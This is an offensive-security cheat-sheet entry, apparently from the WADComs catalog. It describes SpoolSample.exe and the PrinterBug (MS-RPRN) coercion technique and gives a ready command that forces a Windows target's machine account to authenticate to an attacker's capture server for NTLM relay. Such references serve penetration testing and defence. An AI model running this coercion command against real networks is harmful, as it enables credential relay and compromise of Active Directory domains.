Catalog WADComs

WAD · Tool

SpoolSample

1 technique Windows · ActiveDirectoryWADComs GPL-3.0

SpoolSample-PrinterBug

NEW
Execution WindowsActiveDirectory

SpoolSample.exe is the original Windows C# implementation of the PrinterBug (MS-RPRN) coercion technique. Run from an existing foothold on a domain-joined Windows host, it calls the print spooler's change-notification RPC on the target to force that target's machine account to authenticate back to a capture server, which is typically an ntlmrelayx or Responder listener. It is the on-host counterpart to printerbug.py and useful when operating entirely from a compromised Windows box under an existing user context. Requires the Print Spooler service to be running on the target. Command Reference: Target IP: 10.10.10.1 Capture Server IP: 10.10.10.2

SpoolSample.exe 10.10.10.1 10.10.10.2
Native
Exploitation
Requires
Shell
Services
RPC, NTLM